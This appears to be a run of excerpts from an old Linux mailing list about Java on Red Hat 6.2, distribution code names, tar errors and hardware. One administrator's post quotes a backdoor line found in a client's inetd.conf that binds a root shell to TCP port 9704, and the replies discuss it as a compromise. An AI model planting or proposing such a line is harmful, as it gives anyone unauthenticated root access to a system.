driver. Two gotchas: you have to buy
FileMake Pro 5 Developer to get it, and it doesn't work with
JDK 1.3 ( at least not Blackdown's, IBM's, or Sun's )
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;t dl'ed the rpm yet. Any thoughts?
>
I've installed the Sun jdk1.3 on three RH 6.2 machines. You might
also try the one available from the Blackdown group (www.blackdown.org).
Their's is a bzipped tar file.
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(may be forged)
Having never seen anything like this before I got a little suspecious,
but I couldn't see anything unsavory actually happening.
Is this something malicious or just another server having problems?
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rick. Belated
thanks to all who responded.
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on. BeOS was designed for multimedia
use from the very beginning. I think Linux had different goals.
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reful about my purchases than
my employer ) so I've gotten a tad rusty in trouble shooting hardware
problems.
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Thanks Unka, I'll keep that in mind. ;-)
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Steve Frampton wrote:
> > RH 6.2 was called zoot. What's 7.0 called ?
>
> Guinness. Hopefully *not* related to that nasty-tasting beer
> of the same name.
At least it has taste. Most American is little more than carbonated
p!ss-water.
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>Yep, that's an unashamed hack. This is your average "I'm too stupid to
>_hide_ the back door, so I'll hope that no one looks" script kiddie
>signature.
found more info on the cert site. right off the rpc.statd
vulnerability warning ( not a very creative cracker. I mean
jeeze, at least change t
Looking over a clients system I found the following
line in inetd.con:
9704 stream tcp nowait root /bin/sh sh -i
telnet to the port and instant root access.
A quick look around didn't reveal any obvious
problems. I'm worred about the non-obvious
now.
any suggestions for things to do and pla
lid cross-device link" mean? I understand the
> rest of the tar messages.
I'd suspect that the link is a hard link ( as opposed to a symbolic
link ). The former can't be made across file systems. the latter
can. IIRC, that is.
in an existing system.
There are also adapters available.
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> If so, is it's use supported under Linux?
Yep.
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ut I think I am getting closer. I do have the truetype
> fonts working under X thanks to this list's archives.
>
> Any help appreciated
Haven't tried this, but you might start looking for answers here:
http://www-4.ibm.com/software/is/mp/linux/
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